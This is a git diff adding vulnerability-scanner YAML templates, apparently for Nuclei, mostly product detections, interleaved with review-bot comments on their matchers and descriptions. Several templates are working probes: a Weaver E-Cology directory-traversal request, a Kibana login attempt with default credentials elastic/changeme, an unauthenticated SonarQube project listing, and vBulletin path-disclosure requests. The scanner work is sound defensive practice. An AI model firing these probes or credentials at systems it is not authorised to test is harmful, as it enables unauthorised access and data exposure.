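Review bot: The info block has no `description`, and nothing explains why `/v1/sys/debug` is the path queried; a one-liner such as `CasaOS was detected via the version string returned by its /v1/sys/debug endpoint.` tells a reader what the match means. The DSL matcher checks only the lowercase substring `casaos version` with no status constraint; adding `'status_code == 200'` with `condition: and` avoids matching error pages that echo the product name. `verified` is also absent from `metadata`, unlike the sibling detect templates.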
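Review bot: The status matcher pins `/sslvpn/Login` to 403 under `matchers-condition: and`, so a deployment that serves the same branded page with a 200 is silently missed even though the body words are already vendor-specific. Either document why 403 is the expected code with a comment next to the matcher (the reason has to come from the author's verification) or accept both `200` and `403` in the status list. This is hedged, since the template is marked verified and the response it was checked against is not visible here.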
+++ b/poc/detect/chromecast-detect.yaml @@ -0,0 +1,36 @@ +id: chromecast-detect + +info: + name: Google Chromecast - Detect + author: LucianNitescu + severity: info + description: | + Searches for Google Chromecast via their eureka_info route. + reference: + - https://github.com/thewhiteh4t/killcast/blob/ee81cfa03c963d47d3335770fcea2ca48bddeabf/killcast.py#L100C25-L100C43 + - https://rithvikvibhu.github.io/GHLocalApi/#section/Google-Home-Local-API/Authentication + metadata: + verified: true + max-request: 1 + shodan-query: Chromecast + tags: google,chromecast,detect + +http: + - raw: + - | + GET /setup/eureka_info HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"cast_build_revision":' + - '"ssdp_udn":' + condition: and + + - type: status + status: + - 200 +# digest: 4a0a0047304502206c214513406d47d4e688761e11149e983c02c3e47bdfa1f4d01fab2aa15ff11d0221009b017586aea846fc0befea354637be19778ec8c58b0fb2c49e2f28e65855dc2a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/detect/cvsweb-detect.yaml b/poc/detect/cvsweb-detect.yaml new file mode 100644 index 0000000000..3a94bf7c33 --- /dev/null +++ b/poc/detect/cvsweb-detect.yaml 
@@ -0,0 +1,45 @@ +id: cvsweb-detect + +info: + name: CVSweb - Detect + author: lu4nx + severity: info + description: | + CVSweb is a WWW interface for CVS repositories with which you can browse a file hierarchy on your browser to view each file's revision history in a very handy manner. + reference: + - https://cvsweb.openbsd.org/ + metadata: + verified: true + max-request: 1 + shodan-query: title:"cvsweb" + fofa-query: title="cvsweb" + zoomeye-query: title:cvsweb + tags: tech,cvsweb,detect + +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - 'content=".*CVSweb.*"' + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - 'content=".*CVSweb\s*([0-9.]+)"' + +# digest: 490a0046304402205edaaf4869f5e99128f50d300e222b62e3ff929787c084f7271cd034d9b450f502201f253ad5141e8777d354f91ae7cbe61e6a7d08b2a944d9c2cd1b5e30c6ca3b01:922c64590222798bb761d5b6d8e72950 diff --git a/poc/detect/directus-detect.yaml b/poc/detect/directus-detect.yaml new file mode 100644 index 0000000000..b130dc3a9e --- /dev/null +++ b/poc/detect/directus-detect.yaml @@ -0,0 +1,28 @@ +id: directus-detect + +info: + name: Directus - Detect + author: ricardomaia + severity: info + description: | + Directus is a content manager with dynamic access API generation and transparent integration with the main databases. + reference: + - https://directus.io/ + metadata: + verified: true + max-request: 1 + google-query: 'X-Powered-By: Directus' + tags: tech,directus,detect + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: word + part: header + words: + - "X-Powered-By: Directus" + case-insensitive: true +# digest: 490a004630440220479c02cfe34e7b2c20a1a976a14a53f0b1aafded106d55d08b9805cd3715425c02202a6fb91a2289a5fae5ff1ce56b8fef09bfcec164a5546e1ad4a8145584d5212b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
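Review bot: Both the matcher `content=".*CVSweb.*"` and the extractor `content=".*CVSweb\s*([0-9.]+)"` use greedy `.*` inside the quoted attribute, so the pattern can start at an unrelated `content="` attribute, run across the line to a later quote, and the extractor may pick up a number from the wrong attribute. `content="[^"]*CVSweb\s*([0-9.]+)"` keeps the match inside a single attribute value. The description is copied product text; a shorter `CVSweb, a web interface for browsing CVS repositories, was detected.` reads better in the info block.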
diff --git a/poc/detect/element-web-detect.yaml b/poc/detect/element-web-detect.yaml new file mode 100644 index 0000000000..ad7b412929 --- /dev/null +++ b/poc/detect/element-web-detect.yaml @@ -0,0 +1,36 @@ +id: element-web-detect + +info: + name: Element Web - Detect + author: davidegirardi + severity: info + description: Identify if a web application is vanilla Element Web and return the version + metadata: + verified: true + max-request: 2 + shodan-query: html:"manifest.json" + tags: tech,matrix,element,detect + +http: + - method: GET + path: + - "{{BaseURL}}/manifest.json" + - "{{BaseURL}}/version" + + host-redirects: true + max-redirects: 2 + matchers: + - type: dsl + dsl: + - 'status_code_1 == 200' + - 'contains(content_type_1, "application/json")' + - 'contains(json_minify(body_1), "\"name\":\"Element\"")' + - 'status_code_2 == 200' + condition: and + + extractors: + - type: regex + part: body + regex: + - '[^\s]+' +# digest: 4a0a0047304502205410e006bfb51302b79c929988e99705a9fbdcba4f23221cad2c63bc02dc59ce022100ac77e3d22cc46dff3d215d2850f5349cc77bc9ca0700279ee10455163a4795b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/detect/identity-server-v3-detect.yaml b/poc/detect/identity-server-v3-detect.yaml new file mode 100644 index 0000000000..1d54d2dc5f --- /dev/null +++ b/poc/detect/identity-server-v3-detect.yaml 
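Review bot: The extractor `[^\s]+` has `part: body` with no request index, so in this two-request template it emits every whitespace-separated token from `manifest.json` as well as from `/version`, and the output is a noisy dump of the manifest rather than the version the description promises. Restrict it to `part: body_2` (the splunk template in this commit uses `body_3` the same way) and add `name: version`. The description also lacks the `|` block style and trailing period the other detect templates use, which is cosmetic.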
@@ -0,0 +1,38 @@ +id: identity-server-v3-detect + +info: + name: Identity Server V3 - Detect + author: righettod + severity: info + description: | + Identity Server V3 technology was detected. + reference: + - https://identityserver.github.io/Documentation/ + metadata: + verified: true + max-request: 1 + shodan-query: http.title:"IdentityServer v3" + tags: tech,identityserver,detect + +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(body, "IdentityServer v3") && contains(body, "identityserver.github.io")' + condition: and + + extractors: + - type: regex + part: body + group: 1 + regex: + - '(?i)build\s+([a-z0-9.-]+)' +# digest: 4b0a00483046022100cddb07ee93c5a5ea5aaa38543a5cb261019049ec97197bf96407ca82ee44ffb3022100b37750bf50540faa4c6cfbaf893d811a7fef9d22d81d4bf2f631a8faef8e7660:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/detect/limesurvey-detect.yaml b/poc/detect/limesurvey-detect.yaml new file mode 100644 index 0000000000..3707ea8649 --- /dev/null +++ b/poc/detect/limesurvey-detect.yaml 
@@ -0,0 +1,40 @@ +id: limesurvey-detect + +info: + name: LimeSurvey Survey Software - Detect + author: Matt Galligan + severity: info + description: | + Limesurvey is the number one open-source survey software. Advanced features like branching and multiple question types make it a valuable partner for survey-creation. + reference: + - https://github.com/LimeSurvey/LimeSurvey + metadata: + verified: true + max-request: 1 + shodan-query: http.favicon.hash:1781653957 + tags: tech,limesurvey + +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - 'content="LimeSurvey' + - 'alt="LimeSurvey Survey Software' + - 'data-limesurvey-lang=' + - 'alt="Powered by LimeSurvey' + condition: or + case-insensitive: true + + - type: status + status: + - 200 + +# digest: 4a0a00473045022100c785935a42c9693f0bfd8dc790217cb13b8524ec59a862d42b0980b290c4b58602203a031943f0c70c1cae370d25197e1454f98980705027ddabca0e72bad0c11ac8:922c64590222798bb761d5b6d8e72950 diff --git a/poc/detect/matrix-homeserver-detect.yaml b/poc/detect/matrix-homeserver-detect.yaml new file mode 100644 index 0000000000..de3ffd0bb8 --- /dev/null +++ b/poc/detect/matrix-homeserver-detect.yaml 
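Review bot: The `tags` value is `tech,limesurvey` and omits `detect`, while every other detection template in this commit carries it, so this one will be excluded from runs filtered on that tag; change it to `tags: tech,limesurvey,detect`. The description is marketing copy ("the number one open-source survey software", "a valuable partner"); a neutral `LimeSurvey, an open-source survey application, was detected.` is more useful to a reader. The word matcher has no `part:`, which defaults to the body; stating `part: body` keeps it consistent with the phplist template.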
@@ -0,0 +1,37 @@ +id: matrix-homeserver-detect + +info: + name: Matrix Homeserver - Version Detection + author: davidegirardi + severity: info + description: | + Extract the Matrix homeserver name and version + metadata: + verified: true + max-request: 1 + shodan-query: title:"Synapse is running" + tags: tech,matrix,synapse + +http: + - method: GET + path: + - "{{BaseURL}}/_matrix/federation/v1/version" + + redirects: true + max-redirects: 2 + + matchers: + - type: word + part: body + words: + - '"server":' + - '"name":' + - '"version":' + condition: and + + extractors: + - type: json + part: body + json: + - '.server | select((.name != null) and (.version != null)) | .name, .version' +# digest: 4a0a0047304502203e1ffa3c5daae7131064e90d6ef6c55e18e48adb8062b670833ad61902a3d87a022100f9a08b0c7c808f73b24041638cfcbca7eef9289d26402551967c25c1a3a41e92:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/detect/openproject-detect.yaml b/poc/detect/openproject-detect.yaml new file mode 100644 index 0000000000..e96f5f5652 --- /dev/null +++ b/poc/detect/openproject-detect.yaml 
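Review bot: This template uses `redirects: true`, which also follows off-host redirects, whereas the other detect templates in this commit (cvsweb, element-web, identity-server, phplist) use `host-redirects: true`; for a federation version endpoint that means a redirect to another host would attribute that host's `server.name`/`server.version` to the scanned target. Switch to `host-redirects: true` unless cross-host following is intended, in which case a comment saying so would help. `tags` could also include `detect` for consistency with the siblings.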
@@ -0,0 +1,44 @@ +id: openproject-detect + +info: + name: OpenProject - Detect + author: ricardomaia + severity: info + description: OpenProject is an open source web-based project management software. + reference: + - https://www.openproject.org/ + metadata: + verified: "true" + max-request: 3 + shodan-query: title:"openproject" + tags: tech,openproject,api,detect + +http: + - method: GET + path: + - "{{BaseURL}}" + - "{{BaseURL}}/api/v3" + - "{{BaseURL}}/activity.atom" + + stop-at-first-match: true + + matchers-condition: or + matchers: + - type: regex + regex: + - '.*OpenProject.Foundation.\(OPF\)' + - "" + condition: or + + - type: word + words: + - "OpenProject" + - "instanceName" + condition: and + + - type: word + part: header + words: + - "_open_project_session" + +# digest: 4a0a00473045022059c6265ce96feb60a74cefb35bfa8c4a81fdc509fff6aa1ebdac6b44f45aba22022100c16151d234f3d62b7a405702b9fc86de6824c00f7dd6bc08f30fafea7dfc1b5b:922c64590222798bb761d5b6d8e72950 diff --git a/poc/detect/phplist-detect.yaml b/poc/detect/phplist-detect.yaml new file mode 100644 index 0000000000..abeee78371 --- /dev/null +++ b/poc/detect/phplist-detect.yaml 
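Review bot: The first matcher's regex list contains an empty pattern `- ""` under `condition: or`; an empty regular expression matches every response, and with `matchers-condition: or` at the template level this makes the template report OpenProject on every host it is run against. Remove the empty entry (the `condition: or` then becomes unnecessary). Separately, `verified: "true"` is a quoted string while the sibling templates use the boolean `verified: true`, and `.*OpenProject.Foundation.\(OPF\)` uses `.` where a literal space is meant.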
@@ -0,0 +1,42 @@ +id: phplist-detect + +info: + name: phpList - Detect + author: ricardomaia + severity: info + description: | + phpList is an open source newsletter manager. + reference: + - https://www.phplist.org/ + metadata: + verified: true + max-request: 1 + shodan-query: html:"phplist" + tags: tech,phplist,detect + +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + matchers: + - type: word + part: body + words: + - 'content="phpList' + - 'phpList Ltd' + - 'phpList' + condition: or + case-insensitive: true + + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)version.((\d\.?)+)' + +# digest: 4b0a00483046022100b9689d0d38d96a02736636f6b53b41e7c80d65679297db556f6cc0eea8c2417c022100bbdd5891a3b8f5a2ac5070c9420030c82f3bbfcd1d405bf0403634c13c695a61:922c64590222798bb761d5b6d8e72950 diff --git a/poc/detect/tibco-businessconnect-detect.yaml b/poc/detect/tibco-businessconnect-detect.yaml new file mode 100644 index 0000000000..671e1e2a71 --- /dev/null +++ b/poc/detect/tibco-businessconnect-detect.yaml @@ -0,0 +1,28 @@ +id: tibco-businessconnect-detect + +info: + name: TIBCO BusinessConnect - Detect + author: righettod + severity: info + description: | + TIBCO BusinessConnect technology was detected. + reference: + - https://www.tibco.com/products/tibco-businessconnect + metadata: + verified: true + max-request: 1 + shodan-query: http.html:"TIBCO BusinessConnect" + tags: tibco,detect,tech + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(header, "TIBCO BusinessConnect")' + condition: and +# digest: 490a00463044022023712d56e0a2dc0d0bf7d38c1fda0f6bbeeea9729fd945f40c4fe233b716b3f602202da6e40ef235d919061376e66ac3d28b499f7a0ac60662800e2b73c94bd6dbab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
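Review bot: The word matcher's third entry is the bare term `'phpList'` under `condition: or` with `case-insensitive: true`; it subsumes the two more specific entries and fires on any page that merely mentions the product (documentation, blog posts, plugin lists), so the template will over-report. Drop the bare term, or pair the match with a stronger signal such as `status_code == 200` plus the `content="phpList` meta tag. The version extractor `(?i)version.((\d\.?)+)` can also capture a trailing dot (`3.6.`) because `\.?` sits inside the repeated group; `(?i)version\D*(\d+(?:\.\d+)*)` yields a clean version.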
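Review bot: The DSL matcher looks for `TIBCO BusinessConnect` in `header` only, while the `shodan-query` is `http.html:"TIBCO BusinessConnect"`, i.e. the string is expected in the HTML body; unless the product also emits it in a response header (I cannot tell from the template), the matcher will not fire on the hosts that query finds. If the body is the intended location, change the check to `'contains(body, "TIBCO BusinessConnect")'`, or check both with `||`, and say in the description which one the verification was based on.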
diff --git a/poc/detect/wing-ftp-service-detect.yaml b/poc/detect/wing-ftp-service-detect.yaml new file mode 100644 index 0000000000..551f2631dd --- /dev/null +++ b/poc/detect/wing-ftp-service-detect.yaml @@ -0,0 +1,25 @@ +id: wing-ftp-service-detect + +info: + name: Wing FTP Service - Detect + author: ritikchaddha + severity: info + description: | + The File Transfer Protocol (FTP) is a standard network protocol used to transfer computer files between a client and server on a computer network. + metadata: + verified: true + max-request: 1 + shodan-query: "Wing FTP Server" + tags: tech,ftp,wing,detect + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: word + part: header + words: + - "Wing FTP Server" +# digest: 4b0a00483046022100c80a28fe09665c71ca345c950405518bec7b02defcbed410c0a59c743e24da46022100bc4ae224a03b1cecc0f9646db3ce15f82e26125b2eb0fd647cd0ba7395be4be9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/directory_listing/ecology-jqueryfiletree-traversal.yaml b/poc/directory_listing/ecology-jqueryfiletree-traversal.yaml new file mode 100755 index 0000000000..1645c03cdd --- /dev/null +++ b/poc/directory_listing/ecology-jqueryfiletree-traversal.yaml 
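Review bot: The description is a generic definition of the FTP protocol and says nothing about Wing FTP Server, which is what the template detects; `Wing FTP Server's web interface was detected via the product name in a response header.` describes the check. The identical template (same blob `551f2631dd`) is also added as `poc/ftp/wing-ftp-service-detect.yaml` further down in this patch, so the two copies will drift the next time either is edited; keep one. The header word matcher has no `case-insensitive`, which the checkpoint and phplist templates set; harmless, but worth aligning.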
@@ -0,0 +1,36 @@ +id: ecology-jqueryfiletree-traversal + +info: + name: Weaver E-Cology JqueryFileTree - Directory Traversal + author: SleepingBag945 + severity: medium + description: | + Panwei OA E-Cology jqueryFileTree.jsp directory traversal vulnerability. + reference: + - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/90103c248a2c52bb0a060d0ee95d5a67e4579c3d/docs/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Cology%20jqueryFileTree.jsp%20%E7%9B%AE%E5%BD%95%E9%81%8D%E5%8E%86%E6%BC%8F%E6%B4%9E.md?plain=1#L24 + metadata: + verified: true + max-request: 1 + shodan-query: ecology_JSessionid + fofa-query: app="泛微-协同办公OA" + tags: weaver,ecology,traversal,lfr + +http: + - method: GET + path: + - "{{BaseURL}}/hrm/hrm_e9/orgChart/js/jquery/plugins/jqueryFileTree/connectors/jqueryFileTree.jsp?dir=/page/resource/userfile/../../" + + matchers-condition: and + matchers: + - type: word + words: + - "'index.jsp','" + - "重命名" + - "新建目录" + condition: and + + - type: status + status: + - 200 + +# digest: 4a0a004730450220084693227949fe0d92a25b723d712313045095556beeab08ed5c2755c7cc4623022100c12802c1e612411f9558a892fa802d0c08c58b07dcce2104f91503f82c08f847:922c64590222798bb761d5b6d8e72950 diff --git a/poc/elk/elasticsearch-default-login.yaml b/poc/elk/elasticsearch-default-login.yaml new file mode 100644 index 0000000000..330f016c3d --- /dev/null +++ b/poc/elk/elasticsearch-default-login.yaml 
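Review bot: The file is added with mode `100755`, while every other template in this patch is `100644`; a YAML template does not need the executable bit, so clear it before merging. The name says Weaver E-Cology but the description says Panwei OA — both refer to the same vendor (泛微) — and the description should use one name consistently, e.g. `Weaver (Panwei) E-Cology jqueryFileTree.jsp connector lists directories outside the intended root via its dir parameter.` A `classification` with `cwe-id: CWE-22` would match the `traversal` tag.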
@@ -0,0 +1,53 @@ +id: elasticsearch-default-login + +info: + name: ElasticSearch - Default Login + author: Mohammad Reza Omrani | @omranisecurity + severity: high + description: | + Elasticsearch default credentials were discovered. + reference: + - https://www.alibabacloud.com/blog/what-is-the-default-username-and-password-for-elasticsearch_599610 + - https://www.elastic.co/guide/en/elasticsearch/reference/current/built-in-users.html + metadata: + verified: true + max-request: 1 + shodan-query: http.title:"Elastic" || http.favicon.hash:1328449667 + tags: default-login,elasticsearch + +http: + - raw: + - | + POST /internal/security/login HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows; Windows NT 10.1; Win64; x64; en-US) Gecko/20100101 Firefox/49.5 + Referer: {{RootURL}}/login + Content-Type: application/json + kbn-version: 8.8.2 + x-kbn-context: %7B%22name%22%3A%22security_login%22%2C%22url%22%3A%22%2Flogin%22%7D + Origin: {{RootURL}} + + {"providerType":"basic","providerName":"basic","currentURL":"{{BaseURL}}/login","params":{"username":"{{username}}","password":"{{password}}" }} + + payloads: + username: + - elastic + password: + - changeme + attack: pitchfork + + matchers-condition: and + matchers: + - type: word + part: header + words: + - 'Set-Cookie: sid=' + - 'kbn-license-sig:' + condition: and + case-insensitive: true + + - type: status + status: + - 200 + +# digest: 4b0a00483046022100a3408fad3b3714582be692b490de830c2bab27c538a3019730304baf29a3d925022100dedbe43013a6624ea26d84bfc6e3d742cb51405bcf8e14b5c137372eb72f7dd6:922c64590222798bb761d5b6d8e72950 diff --git a/poc/exposed/graylog-api-exposure.yaml b/poc/exposed/graylog-api-exposure.yaml new file mode 100644 index 0000000000..62d08209c3 --- /dev/null +++ b/poc/exposed/graylog-api-exposure.yaml 
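Review bot: The request goes to `/internal/security/login` with `kbn-version` and `x-kbn-context` headers, which is Kibana's login API rather than Elasticsearch's own REST interface, so the id, name and `elasticsearch` tag misdescribe what is checked; naming it after Kibana, or stating in the description that the check goes through Kibana's login endpoint, avoids confusing triage. The hard-coded `kbn-version: 8.8.2` ties the request to one Kibana release; if the server enforces a matching version header, other releases will fail the check and produce false negatives, which should at least be documented in the description.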
@@ -0,0 +1,91 @@ +id: graylog-api-exposure + +info: + name: Graylog REST API Endpoints - Exposure + author: Arqsz + severity: info + description: | + Graylog is a centralized log management solution. According to the official documentation, it exposes multiple endpoints (some by default). + reference: + - https://go2docs.graylog.org/5-0/setting_up_graylog/rest_api.html + - https://gist.github.com/asachs01/f1f317b2924a688deb8ed2520a4520bd + metadata: + verified: true + max-request: 50 + shodan-query: Graylog + tags: tech,graylog,api,swagger,fuzz + +http: + - method: GET + path: + - "{{BaseURL}}" + - "{{BaseURL}}/api/api-docs" + - "{{BaseURL}}/api/api-browser" + - "{{BaseURL}}/api/cluster" + - "{{BaseURL}}/api/dashboards" + - "{{BaseURL}}/api/events/definitions" + - "{{BaseURL}}/api/events/definitions/validate" + - "{{BaseURL}}/api/events/notifications/test" + - "{{BaseURL}}/api/events/search" + - "{{BaseURL}}/api/free-enterprise/license" + - "{{BaseURL}}/api/plugins/org.graylog.enterprise.integrations/office365/checkSubscriptions" + - "{{BaseURL}}/api/plugins/org.graylog.enterprise.integrations/office365/inputs" + - "{{BaseURL}}/api/plugins/org.graylog.enterprise.integrations/office365/startSubscription" + - "{{BaseURL}}/api/plugins/org.graylog.integrations/aws/cloudwatch/log_groups" + - "{{BaseURL}}/api/plugins/org.graylog.integrations/aws/inputs" + - "{{BaseURL}}/api/plugins/org.graylog.integrations/aws/kinesis/auto_setup/create_stream" + - "{{BaseURL}}/api/plugins/org.graylog.integrations/aws/kinesis/auto_setup/create_subscription" + - "{{BaseURL}}/api/plugins/org.graylog.integrations/aws/kinesis/auto_setup/create_subscription_policy" + - "{{BaseURL}}/api/plugins/org.graylog.integrations/aws/kinesis/health_check" + - "{{BaseURL}}/api/plugins/org.graylog.integrations/aws/kinesis/streams" + - "{{BaseURL}}/api/plugins/org.graylog.plugins.archive/archives/catalog/rebuild" + - "{{BaseURL}}/api/plugins/org.graylog.plugins.archive/backends" + - 
"{{BaseURL}}/api/plugins/org.graylog.plugins.archive/cluster/archives/catalog/rebuild" + - "{{BaseURL}}/api/plugins/org.graylog.plugins.collector/configurations" + - "{{BaseURL}}/api/plugins/org.graylog.plugins.license/licenses/verify" + - "{{BaseURL}}/api/plugins/org.graylog.plugins.report/reports" + - "{{BaseURL}}/api/plugins/org.graylog.plugins.security/team-sync/test/backend" + - "{{BaseURL}}/api/plugins/org.graylog.plugins.security/teams" + - "{{BaseURL}}/api/scheduler/jobs" + - "{{BaseURL}}/api/system/authentication/services/backends" + - "{{BaseURL}}/api/system/authentication/services/test/backend/connection" + - "{{BaseURL}}/api/system/authentication/services/test/backend/login" + - "{{BaseURL}}/api/system" + - "{{BaseURL}}/api/system/content_packs" + - "{{BaseURL}}/api/system/indexer/cluster/health" + - "{{BaseURL}}/api/system/indexer/cluster/name" + - "{{BaseURL}}/api/system/debug/events/cluster" + - "{{BaseURL}}/api/system/debug/events/local" + - "{{BaseURL}}/api/system/jobs" + - "{{BaseURL}}/api/system/pipelines/pipeline" + - "{{BaseURL}}/api/system/pipelines/rule" + - "{{BaseURL}}/api/system/urlwhitelist/check" + - "{{BaseURL}}/api/system/urlwhitelist/generate_regex" + - "{{BaseURL}}/api/views" + - "{{BaseURL}}/api/views/fields" + - "{{BaseURL}}/api/views/forValue" + - "{{BaseURL}}/api/views/search/messages" + - "{{BaseURL}}/api/views/search/metadata" + - "{{BaseURL}}/api/views/search/sync" + - "{{BaseURL}}/api/users" + + host-redirects: true + stop-at-first-match: true + + matchers-condition: or + matchers: + - type: dsl + dsl: + - "status_code == 200" + - "contains_any(header, 'X-Graylog-Node-Id', 'Graylog', 'graylog')" + - "contains_any(body, 'X-Graylog-Node-Id', 'Graylog', 'graylog')" + - "contains_any(body, 'swagger')" + condition: and + + - type: dsl + name: unauthorized-graylog-header + dsl: + - "status_code == 401" + - "contains(header, 'X-Graylog-Node-Id') || contains(header, 'Graylog Server')" + condition: and +# digest: 
4b0a00483046022100cfdfa42b1d6eceea7948a44eebd55448c0553992200628d09080452422232dd7022100a11fdf4e1c293d3669c0923ed6177f2192e0ac22ff1af23651878299747ad7e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/exposed/rakefile-disclosure.yaml b/poc/exposed/rakefile-disclosure.yaml new file mode 100644 index 0000000000..466670d5bb --- /dev/null +++ b/poc/exposed/rakefile-disclosure.yaml @@ -0,0 +1,40 @@ +id: rakefile-disclosure + +info: + name: Rakefile - File Disclosure + author: DhiyaneshDK + severity: info + description: | + Rakefile configuration file was detected. + reference: + - https://ruby.github.io/rake/doc/rakefile_rdoc.html + metadata: + verified: true + max-request: 1 + shodan-query: html:"Rakefile" + tags: devops,exposure,rakefile,config,ruby,rails + +http: + - method: GET + path: + - "{{BaseURL}}/Rakefile" + + matchers-condition: or + matchers: + - type: word + part: body + words: + - 'application.load_tasks' + - 'config/application' + condition: and + case-insensitive: true + + - type: word + part: body + words: + - 'require' + - 'desc' + - 'task :' + condition: and + +# digest: 490a00463044022006d1348a9ef873df72d1fb2c0826d6d4ab59cae528ffd3b606b12acb7cd446d402206735a2059c2232203e2902431481d570b764b24f0dac6abcabd0507111b0c262:922c64590222798bb761d5b6d8e72950 diff --git a/poc/exposed/request-baskets-exposure.yaml b/poc/exposed/request-baskets-exposure.yaml index 995cfe7e86..61df9e73d1 100644 --- a/poc/exposed/request-baskets-exposure.yaml +++ b/poc/exposed/request-baskets-exposure.yaml @@ -4,6 +4,7 @@ info: name: Request Baskets - Exposure author: DhiyaneshDk severity: low + description: Request Baskets is exposed. reference: - https://notes.sjtu.edu.cn/s/MUUhEymt7# - https://github.com/entr0pie/CVE-2023-27163 
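Review bot: The second matcher (`unauthorized-graylog-header`) reports a finding on `status_code == 401` with a Graylog header, i.e. on instances that correctly require authentication, and because `matchers-condition: or` combines it with the first matcher the template labels properly protected hosts as an API "exposure". Either drop that matcher, or rename the template to a detection and say in the description that the named matcher only identifies an authenticated Graylog API. The first matcher requires `contains_any(body, 'swagger')` under `condition: and`, so only responses that mention swagger (in practice the API docs/browser pages) can satisfy it and most of the 50 listed paths can never match; trim the list and lower `max-request`, or move the swagger check into its own matcher.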
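Review bot: The second word matcher accepts any body containing `require`, `desc` and `task :` with no status constraint, and `matchers-condition: or` lets it fire on its own, so a soft-404 or an unrelated page that happens to include those three tokens gets reported; a single DSL matcher `status_code == 200 && contains_all(body, 'require', 'desc', 'task :')` keeps the same signal and adds the status check. `case-insensitive: true` is set on the first matcher only; decide one way for both. Severity is `info` here while the viminfo disclosure in the same commit is `low`; both are file exposures, so the ranking deserves a sentence in the description.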
@@ -33,5 +34,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100efc1e11d921661ef61f541cf6c8847d9962aab9193aabd2ea7ac44f2af94138c02205d1f9273137feac456b67992318ac1c71e5f832ae41fabc08e475198d70b0d4b:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100fa78a210d11be0b983da6d176dd620213458b20c223773dd517f3d50a2170b440221009b8bfc94b1596f0857e78932cdf803bc9efda41d8d0e8a2d2e7f91d238f09865:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/exposed/sonarqube-projects-disclosure.yaml b/poc/exposed/sonarqube-projects-disclosure.yaml new file mode 100644 index 0000000000..4c11c81f3e --- /dev/null +++ b/poc/exposed/sonarqube-projects-disclosure.yaml @@ -0,0 +1,42 @@ +id: sonarqube-projects-disclosure + +info: + name: SonarQube - Information Disclosure + author: DhiyaneshDk + severity: medium + description: | + Information leakage vulnerability in an interface of SonarQube, you can download the source code through the tool. + reference: + - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/webapp/SonarQube/SonarQube%20search_projects%20%E9%A1%B9%E7%9B%AE%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E.md + - https://github.com/deletescape/sloot + metadata: + verified: true + max-request: 1 + shodan-query: title:"Sonarqube" + fofa-query: app="sonarQube-代码管理" + tags: sonarqube,exposure,misconfig + +http: + - method: GET + path: + - "{{BaseURL}}/api/components/search_projects" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"visibility":"public"' + - '{"organization' + condition: and + + - type: word + part: header + words: + - 'application/json' + + - type: status + status: + - 200 + +# digest: 4a0a00473045022007a5c2766f7648947c60b9d94121e7d4c522fce141ab6513f1e74b4439e5c869022100e6096339fde4571b6d11b0a6aff6f84e658bead95452dcb7bf8e253ecd6f9c3f:922c64590222798bb761d5b6d8e72950 
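Review bot: The description says source code "can be downloaded through the tool", but the template only confirms that `/api/components/search_projects` lists public projects without authentication; the download is the referenced sloot tool's job, not this check's. Reword to what is verified, e.g. `The SonarQube projects API is reachable without authentication and lists projects marked public; the referenced tooling can retrieve their sources.` The first sentence of the current description is also ungrammatical ("Information leakage vulnerability in an interface of SonarQube, you can ...").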
diff --git a/poc/exposed/vbulletin-path-disclosure.yaml b/poc/exposed/vbulletin-path-disclosure.yaml new file mode 100644 index 0000000000..621dc74d5d --- /dev/null +++ b/poc/exposed/vbulletin-path-disclosure.yaml @@ -0,0 +1,58 @@ +id: vbulletin-path-disclosure + +info: + name: vBulletin - Full Path Disclosure + author: MaStErChO + severity: info + reference: + - https://github.com/OWASP/vbscan/blob/master/modules/pathdisclure.pl + metadata: + verified: true + max-request: 11 + shodan-query: "title:\"vBulletin\"" + tags: config,exposure,fpd,vbulletin +flow: http(1) && http(2) + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: word + part: body + words: + - "vBulletin" + + - method: GET + path: + - "{{BaseURL}}/forumdisplay.php?do[]=[test.dll]" + - "{{BaseURL}}/calendar.php?do[]=[test.dll]" + - "{{BaseURL}}/search.php?do[]=[test.dll]" + - "{{BaseURL}}/forumrunner/include/album.php" + - "{{BaseURL}}/core/vb5/route/channel.php" + - "{{BaseURL}}/core/vb5/route/conversation.php" + - "{{BaseURL}}/includes/api/interface/noncollapsed.php" + - "{{BaseURL}}/includes/api/interface/collapsed.php" + - "{{BaseURL}}/vbseo_sitemap/addons/vbseo_sm_vba.php" + - "{{BaseURL}}/vbseo_sitemap/addons/vbseo_sm_vba_links.php" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Warning:" + - "Cannot modify header information" + - "/strong> on line" + - "trim() expects parameter" + - "class_core.php" + - "header already sent" + - "Fatal error" + condition: or + + - type: status + status: + - 200 +# digest: 